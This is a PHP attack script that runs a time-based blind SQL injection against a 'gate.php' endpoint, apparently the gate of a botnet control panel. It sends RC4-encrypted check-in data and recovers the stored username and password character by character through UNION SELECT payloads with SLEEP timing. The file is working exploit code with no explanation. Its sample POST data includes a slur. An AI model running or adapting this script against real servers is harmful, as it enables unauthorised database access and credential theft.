<?php
set_time_limit(0);
define( 'SLEEP_TIME' , '4' );
define( 'PAGE_TIME' , 4);
echo ( 'attacking ' . URL . PHP_EOL);
get_string( 'username' );
get_string( 'password' );
function get_length( $field ) {
$length = 1;
while (!is_true( "' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- " )) {
++ $length ;
}
echo ( $field . ' length: ' . $length . PHP_EOL);
return $length ;
}
function get_string( $field ) {
$length = get_length( $field );
$str = '' ;
for ( $i = 0; $i < $length ; ++ $i ) {
$str .= chr (get_char( $field , $i ));
echo ( $field . ' : ' . str_pad ( $str , $length , '*' ) . PHP_EOL);
}
return $str ;
}
function get_char( $field , $id ) {
$binary = '' ;
for ( $i = 1; $i < 256; $i *= 2) {
if ( $i == 128)
$binary = '0' . $binary ;
else
$binary = (is_true( "' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ( $id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- " ) ? '1 ' : ' 0') . $binary ;
}
return bindec ( $binary );
}
function is_true( $query ) {
$rc4_key = 'aaaa' ;
$data = 'u=tapz&d=faggot&b=lol' ;
$encode = rc4( $rc4_key , $data , strlen ( $data ), strlen ( $rc4_key ));
$encode = $rc4_key . $encode ;
$injection = urlencode( $query );
$req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection , $encode );
return !( $req [ 'time' ] < PAGE_TIME);
}
function post_request( $url , $data ) {
$handle = curl_init( $url );
curl_setopt( $handle , CURLOPT_HEADER, false);
curl_setopt( $handle , CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36' );
curl_setopt( $handle , CURLOPT_RETURNTRANSFER, true);
curl_setopt( $handle , CURLOPT_POST, true);
curl_setopt( $handle , CURLOPT_POSTFIELDS, $data );
curl_setopt( $handle , CURLOPT_TIMEOUT, 30);
$time = microtime(true);
$page = curl_exec( $handle );
$time = microtime(true) - $time ;
curl_close( $handle );
return array (
'page' => $page ,
'time' => $time
);
}
function rc4( $pwd , $data , $data_length , $pwd_length ){
$key [] = '' ;
$box [] = '' ;
$cipher = '' ;
for ( $i = 0; $i < 256; $i ++)
{
$key [ $i ] = ord( $pwd [ $i % $pwd_length ]);
$box [ $i ] = $i ;
}
for ( $j = $i = 0; $i < 256; $i ++)
{
$j = ( $j + $box [ $i ] + $key [ $i ]) % 256;
$tmp = $box [ $i ];
$box [ $i ] = $box [ $j ];
$box [ $j ] = $tmp ;
}
for ( $a = $j = $i = 0; $i < $data_length ; $i ++)
{
$a = ( $a + 1) % 256;
$j = ( $j + $box [ $a ]) % 256;
$tmp = $box [ $a ];
$box [ $a ] = $box [ $j ];
$box [ $j ] = $tmp ;
$k = $box [(( $box [ $a ] + $box [ $j ]) % 256)];
$cipher .= chr (ord( $data [ $i ]) ^ $k );
}
return $cipher ;
}
|